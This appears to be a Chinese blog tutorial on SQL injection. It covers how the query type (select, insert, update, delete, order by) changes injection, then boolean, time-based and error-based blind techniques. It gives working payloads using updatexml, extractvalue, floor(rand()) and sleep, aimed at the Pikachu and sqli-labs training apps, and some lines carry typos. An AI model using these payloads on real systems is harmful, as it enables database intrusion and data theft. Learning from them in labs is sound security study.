SQL注入之查询方式及报错盲注_select 1报错-优快云博客

本文链接：https://blog.youkuaiyun.com/m0_48907714/article/details/123916815

查询方式及报错盲注

注入无回显,可能是SQL语句查询方式的问题造成,这时我们需要用到相关的报错或者盲注进行后续操作

select 查询数据

select * from new where id=$id

insert 插入数据

instert into news(id,url,text) valuse (2,‘x’,’$t’)

delete 删除数据

delete from news where id=$id

update更新数据

update user set pwd=’$p’ where id=2 and username=‘admin’

order by 排序数据(通过表明排序)

select * from news order by $id

SQL报错盲注

基于布尔的SQL盲注-逻辑判断

regexp like ascii left ord mid

基于时间的SQL盲注－延时判断

if sleep

基于报错的SQL盲注－报错回显

floor updatexml extractvalue

基于布尔的SQL盲注

/pikachu/vul/sqli/sqli_iu/sqli_reg.php

username=12321’ or updatexml(1,concat(0x7e,version(),0x7e),3) or '&password=123&sex=213&phonenum=213&email=213&add=32432&submit=submit

’ or updatexml(1,concat(0x7e,version(),0x7e),3) or '

在这里插入图片描述

username=12321’ or (select 1 from (select count(*),concat((select(select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '&password=123&sex=213&phonenum=213&email=213&add=32432&submit=submit

’ or (select 1 from (select count(),concat((select(select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a) or '
在这里插入图片描述

username=12321’ or extractvalue(1,concat(0x7e,database(),0x7e)) or '&password=123&sex=213&phonenum=213&email=213&add=32432&submit=submit

’ or extractvalue(1,concat(0x7e,database(),0x7e)) or '
在这里插入图片描述
如果在数据包进行注入时，可以将空格换成+

基于时间的SQL盲注

函数：if(条件,ture返回值,错误返回值) sleep() ascii()
数据库内

select if(database()=‘pakachu’,123,sleep(5));
select * from users where id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0);

例子
/sqli-labs-master/Less-1/?id=1’ and if(database()=‘a’,sleep(1),sleep(10)) --+
sqli-labs-master/Less-1/?id=1’ and if(length(database())=‘8’,sleep(10),1) --+
’ and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+

’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(15),0) --+
在这里插入图片描述